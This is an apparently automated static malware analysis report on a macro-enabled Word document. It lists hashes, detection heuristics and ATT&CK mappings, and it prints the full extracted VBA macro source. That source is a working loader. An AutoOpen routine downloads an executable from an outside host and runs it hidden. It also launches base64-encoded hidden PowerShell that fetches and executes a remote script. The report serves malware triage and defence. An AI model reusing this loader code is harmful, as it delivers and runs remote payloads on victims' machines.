Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 7013aa29f31e89c6…

MALICIOUS

Office (OOXML)

231.7 KB Created: 2015-07-23 15:20:00 UTC Authoring application: Microsoft Office Word 15.0000 First seen: 2015-09-30
MD5: aa6dcd1f5d6401f5596e279565df5b30 SHA-1: 30e1f8ff9f69f5eec2c9b1ee6af9f194bc9838b2 SHA-256: 7013aa29f31e89c6e9eda908258d245253340fa56ac29be15be2d7dab5ec3045
512 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1105 Ingress Tool Transfer T1204.002 Malicious File T1059.001 PowerShell

The sample is a malicious OOXML document containing VBA macros. The macros utilize WScript.Shell and PowerShell to download and execute a file from the URL http://www.yourpentesting.com/APT/CommandCam.exe. The presence of an AutoOpen macro and obfuscated code suggests a loader designed to execute a second-stage payload.

Heuristics 13

  • VBA project inside OOXML medium 9 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    Call Shell(Base64DecodeString(strProgramName), vbHide)
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    'Set objShell = CreateObject("Wscript.shell")
  • PowerShell reference in VBA critical OLE_VBA_PS
    PowerShell reference in VBA
    Matched line in script
    'https://enigma0x3.wordpress.com/2014/01/11/using-a-powershell-payload-in-a-client-side-attack/
  • VBA Base64-decoded Shell command stager critical OLE_VBA_BASE64_SHELL_COMMAND_STAGER
    VBA auto-exec macro decodes Base64 string literals into command or script-launch text and executes the result with Shell. This catches cmd/cscript/PowerShell/VBS launchers hidden from plain keyword matching.
    Matched line in script
    Set xmlHTTP = CreateObject("Microsoft.XMLHTTP")
  • VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC
    VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
    Matched line in script
        If fnSaveDownloadFile(strSaveAs, .responseBody) = False Then
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
    Set xmlHTTP = CreateObject("Microsoft.XMLHTTP")
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set xmlHTTP = CreateObject("Microsoft.XMLHTTP")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • External relationship high OOXML_EXTERNAL_REL
    External target in word/_rels/settings.xml.rels: file:///C:\Users\micael.leal\Desktop\Guillaume.dotm
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.yourpentesting.com/APT/CommandCam.exe Referenced by macro
    • http://www.source-code.biz/snippets/vbasic/12.htmReferenced by macro
    • http://www.source-code.biz/snippets/vbasic/12.htmts/vba]@�D8Referenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvasReferenced by macro
    • http://schemas.openxmlformats.org/markup-compatibility/2006Referenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsReferenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/mathReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingReferenced by macro
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingReferenced by macro
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2012/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkReferenced by macro
    • http://schemas.microsoft.com/office/word/2006/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeReferenced by macro
    • https://countuponsecurity.files.wordpress.com/2014/10/feodo-docmechanics.pngReferenced by macro
    • https://enigma0x3.wordpress.com/2014/01/11/using-a-powershell-payload-in-a-client-side-attack/Referenced by macro
    • https://countuponsecurity.files.wordpress.com/2014/10/feodo-docmechanics.pngtReferenced by macro
    • https://enigma0x3.wordpress.com/2014/01/11/using-a-powershell-payload-in-a-client-side-attack/tion�Referenced by macro

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 9320 bytes
SHA-256: 9539d6f3c2f6f38a1925884d48526bbaa42b67a1e5b4483f4afed812e0afa8a4
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "CommandButton1, 0, 0, MSForms, CommandButton"
Option Explicit
'Code of base64 encode and decode : http://www.source-code.biz/snippets/vbasic/12.htm
Private InitDone  As Boolean
Private Map1(0 To 63)  As Byte
Private Map2(0 To 127) As Byte
Private Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)
' Encodes a string into Base64 format.
' No blanks or line breaks are inserted.
' Parameters:
'   S         a String to be encoded.
' Returns:    a String with the Base64 encoded data.
Public Function Base64EncodeString(ByVal s As String) As String
   Base64EncodeString = Base64Encode(ConvertStringToBytes(s))
   End Function

' Encodes a byte array into Base64 format.
' No blanks or line breaks are inserted.
' Parameters:
'   InData    an array containing the data bytes to be encoded.
' Returns:    a string with the Base64 encoded data.
Public Function Base64Encode(InData() As Byte)
   Base64Encode = Base64Encode2(InData, UBound(InData) - LBound(InData) + 1)
   End Function

' Encodes a byte array into Base64 format.
' No blanks or line breaks are inserted.
' Parameters:
'   InData    an array containing the data bytes to be encoded.
'   InLen     number of bytes to process in InData.
' Returns:    a string with the Base64 encoded data.
Public Function Base64Encode2(InData() As Byte, ByVal InLen As Long) As String
   If Not InitDone Then Init
   If InLen = 0 Then Base64Encode2 = "": Exit Function
   Dim ODataLen As Long: ODataLen = (InLen * 4 + 2) \ 3     ' output length without padding
   Dim OLen As Long: OLen = ((InLen + 2) \ 3) * 4           ' output length including padding
   Dim Out() As Byte
   ReDim Out(0 To OLen - 1) As Byte
   Dim ip0 As Long: ip0 = LBound(InData)
   Dim ip As Long
   Dim op As Long
   Do While ip < InLen
      Dim i0 As Byte: i0 = InData(ip0 + ip): ip = ip + 1
      Dim i1 As Byte: If ip < InLen Then i1 = InData(ip0 + ip): ip = ip + 1 Else i1 = 0
      Dim i2 As Byte: If ip < InLen Then i2 = InData(ip0 + ip): ip = ip + 1 Else i2 = 0
      Dim o0 As Byte: o0 = i0 \ 4
      Dim o1 As Byte: o1 = ((i0 And 3) * &H10) Or (i1 \ &H10)
      Dim o2 As Byte: o2 = ((i1 And &HF) * 4) Or (i2 \ &H40)
      Dim o3 As Byte: o3 = i2 And &H3F
      Out(op) = Map1(o0): op = op + 1
      Out(op) = Map1(o1): op = op + 1
      Out(op) = IIf(op < ODataLen, Map1(o2), Asc("=")): op = op + 1
      Out(op) = IIf(op < ODataLen, Map1(o3), Asc("=")): op = op + 1
      Loop
   Base64Encode2 = ConvertBytesToString(Out)
   End Function

' Decodes a string from Base64 format.
' Parameters:
'    s        a Base64 String to be decoded.
' Returns     a String containing the decoded data.
Public Function Base64DecodeString(ByVal s As String) As String
   If s = "" Then Base64DecodeString = "": Exit Function
   Base64DecodeString = ConvertBytesToString(Base64Decode(s))
   End Function

' Decodes a byte array from Base64 format.
' Parameters
'   s         a Base64 String to be decoded.
' Returns:    an array containing the decoded data bytes.
Public Function Base64Decode(ByVal s As String) As Byte()
   If Not InitDone Then Init
   Dim IBuf() As Byte: IBuf = ConvertStringToBytes(s)
   Dim ILen As Long: ILen = UBound(IBuf) + 1
   If ILen Mod 4 <> 0 Then Err.Raise vbObjectError, , "Length of Base64 encoded input string is not a multiple of 4."
   Do While ILen > 0
      If IBuf(ILen - 1) <> Asc("=") Then Exit Do
      ILen = ILen - 1
      Loop
   Dim OLen As Long: OLen = (ILen * 3) \ 4
   Dim Out() As Byte
   ReDim Out(0 To OLen - 1) As Byte
   Dim ip As Long
   Dim op As Long
   Do While ip < ILen
      Dim i0 As Byte: i0 = IBuf(ip): ip = ip + 1
      Dim i1 As Byte: i1 = IBuf(ip): ip = ip + 1
      Dim i2 As Byte: If ip < ILen Then i2 = IBuf(ip): ip = ip + 1 Else i2 = Asc("A")
      Dim i3 As Byte: If ip < ILen Then i3 = IBuf(ip): ip = ip + 1 Else i3 = Asc("A")
      If i0 > 127 Or i1 > 127 Or i2 > 127 Or i3 > 127 Then _
         Err.Raise vbObjectError, , "Illegal character in Base64 encoded data."
      Dim b0 As Byte: b0 = Map2(i0)
      Dim b1 As Byte: b1 = Map2(i1)
      Dim b2 As Byte: b2 = Map2(i2)
      Dim b3 As Byte: b3 = Map2(i3)
      If b0 > 63 Or b1 > 63 Or b2 > 63 Or b3 > 63 Then _
         Err.Raise vbObjectError, , "Illegal character in Base64 encoded data."
      Dim o0 As Byte: o0 = (b0 * 4) Or (b1 \ &H10)
      Dim o1 As Byte: o1 = ((b1 And &HF) * &H10) Or (b2 \ 4)
      Dim o2 As Byte: o2 = ((b2 And 3) * &H40) Or b3
      Out(op) = o0: op = op + 1
      If op < OLen Then Out(op) = o1: op = op + 1
      If op < OLen Then Out(op) = o2: op = op + 1
      Loop
   Base64Decode = Out
   End Function

Private Sub Init()
   Dim c As Integer, i As Integer
   ' set Map1
   i = 0
   For c = Asc("A") To Asc("Z"): Map1(i) = c: i = i + 1: Next
   For c = Asc("a") To Asc("z"): Map1(i) = c: i = i + 1: Next
   For c = Asc("0") To Asc("9"): Map1(i) = c: i = i + 1: Next
   Map1(i) = Asc("+"): i = i + 1
   Map1(i) = Asc("/"): i = i + 1
   ' set Map2
   For i = 0 To 127: Map2(i) = 255: Next
   For i = 0 To 63: Map2(Map1(i)) = i: Next
   InitDone = True
   End Sub

Private Function ConvertStringToBytes(ByVal s As String) As Byte()
   Dim b1() As Byte: b1 = s
   Dim l As Long: l = (UBound(b1) + 1) \ 2
   If l = 0 Then ConvertStringToBytes = b1: Exit Function
   Dim b2() As Byte
   ReDim b2(0 To l - 1) As Byte
   Dim p As Long
   For p = 0 To l - 1
      Dim c As Long: c = b1(2 * p) + 256 * CLng(b1(2 * p + 1))
      If c >= 256 Then c = Asc("?")
      b2(p) = c
      Next
   ConvertStringToBytes = b2
   End Function

Private Function ConvertBytesToString(b() As Byte) As String
   Dim l As Long: l = UBound(b) - LBound(b) + 1
   Dim b2() As Byte
   ReDim b2(0 To (2 * l) - 1) As Byte
   Dim p0 As Long: p0 = LBound(b)
   Dim p As Long
   For p = 0 To l - 1: b2(2 * p) = b(p0 + p): Next
   Dim s As String: s = b2
   ConvertBytesToString = s
   End Function
Private Sub DownloadFile()
On Error GoTo errHere
 
Dim strQRY As String
 
Dim strHTTP As String
Dim strFileToSave As String
 
strHTTP = "aHR0cDovL3d3dy55b3VycGVudGVzdGluZy5jb20vQVBUL0NvbW1hbmRDYW0uZXhl"

MkDir "C:/test/"

strFileToSave = "QzovdGVzdC9Db21tYW5kQ2FtLmV4ZQ=="
 
If fnDownloadHTTP(Base64DecodeString(strHTTP), Base64DecodeString(strFileToSave)) = False Then      ' -- downlaod the file
    MsgBox "File DL failed. Make sure folder exist"
    GoTo ExitHere
End If
 
'MsgBox "Thumbs up :-)"
 
ExitHere:
    Exit Sub
errHere:
    Resume ExitHere
End Sub
 
Public Function fnDownloadHTTP(strTarget As String, strSaveAs As String, Optional strUN As String, Optional strPW As String) As Boolean
On Error GoTo errHere
 
Dim xmlHTTP As Object
Dim strRespText As String
fnDownloadHTTP = True
Set xmlHTTP = CreateObject("Microsoft.XMLHTTP")
With xmlHTTP
    .Open "GET", strTarget, False, strUN, strPW
    .setRequestHeader "cache-control", "no-cache,must revalidate"
    .Send
    If fnSaveDownloadFile(strSaveAs, .responseBody) = False Then
        GoTo errHere
    End If
End With
 
ExitHere:
    Set xmlHTTP = Nothing
    Exit Function
 
errHere:
    fnDownloadHTTP = False
    Resume ExitHere
End Function
 
Private Function fnSaveDownloadFile(strFilePath, bytArray) As Boolean
On Error GoTo errHere
 
 
Dim objStream  As Object 'New ADODB.Stream
fnSaveDownloadFile = True
Set objStream = CreateObject("ADODB.Stream")
With objStream
    .Type = 1 'adTypeBinary
    .Open
    .Write bytArray
    .SaveToFile strFilePath, 2 'adSaveCreateOverWrite
End With
 
ExitHere:
    Exit Function
errHere:
    fnSaveDownloadFile = False
    Resume ExitHere
End Function
Sub AutoOpen()
'https://countuponsecurity.files.wordpress.com/2014/10/feodo-docmechanics.png
'https://enigma0x3.wordpress.com/2014/01/11/using-a-powershell-payload-in-a-client-side-attack/
'Set objFSO = CreateObject("Scripting.FileSystemObject")
'Set objShell = CreateObject("Wscript.shell")
'vbMaximizedFocus or vbHide

DownloadFile

Dim strProgramName As String
Dim strArgument As String

Sleep 5000

strProgramName = "QzovdGVzdC9Db21tYW5kQ2FtLmV4ZSAvZmlsZW5hbWUgQzovdGVzdC9teWNhbWVyYS5ibXA="

Call Shell(Base64DecodeString(strProgramName), vbHide)

Dim payload, wscript As String

' no hidden
'payload = "cG93ZXJzaGVsbC5leGUgLUV4ZWN1dGlvblBvbGljeSBCeXBhc3MgLW5vbG9nbyAtbm9wcm9maWxlIC1jIElFWCAoKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHA6Ly93d3cueW91cnBlbnRlc3RpbmcuY29tL0FQVC9GSU5BTC5wczEnKSk="


'hidden powershell
payload = "cG93ZXJzaGVsbC5leGUgLUV4ZWN1dGlvblBvbGljeSBCeXBhc3MgLXdpbmRvd3N0eWxlIGhpZGRlbiAtbm9sb2dvIC1ub3Byb2ZpbGUgLWMgSUVYICgoTmV3LU9iamVjdCBOZXQuV2ViQ2xpZW50KS5Eb3dubG9hZFN0cmluZygnaHR0cDovL3d3dy55b3VycGVudGVzdGluZy5jb20vQVBUL0ZJTkFMLnBzMScpKQ=="

wscript = "V1NjcmlwdC5TaGVsbA=="


CreateObject(Base64DecodeString(wscript)).Run ("" & Base64DecodeString(payload) & "")
 
Sleep 1000

End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 44544 bytes
SHA-256: d6771af6a0f3f8262fa710c3a9db01623136504a896b3c9f0638772d83e0c2c2
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 long base64-like blob(s).

Open this report in the interactive analyzer, or submit your own file for analysis.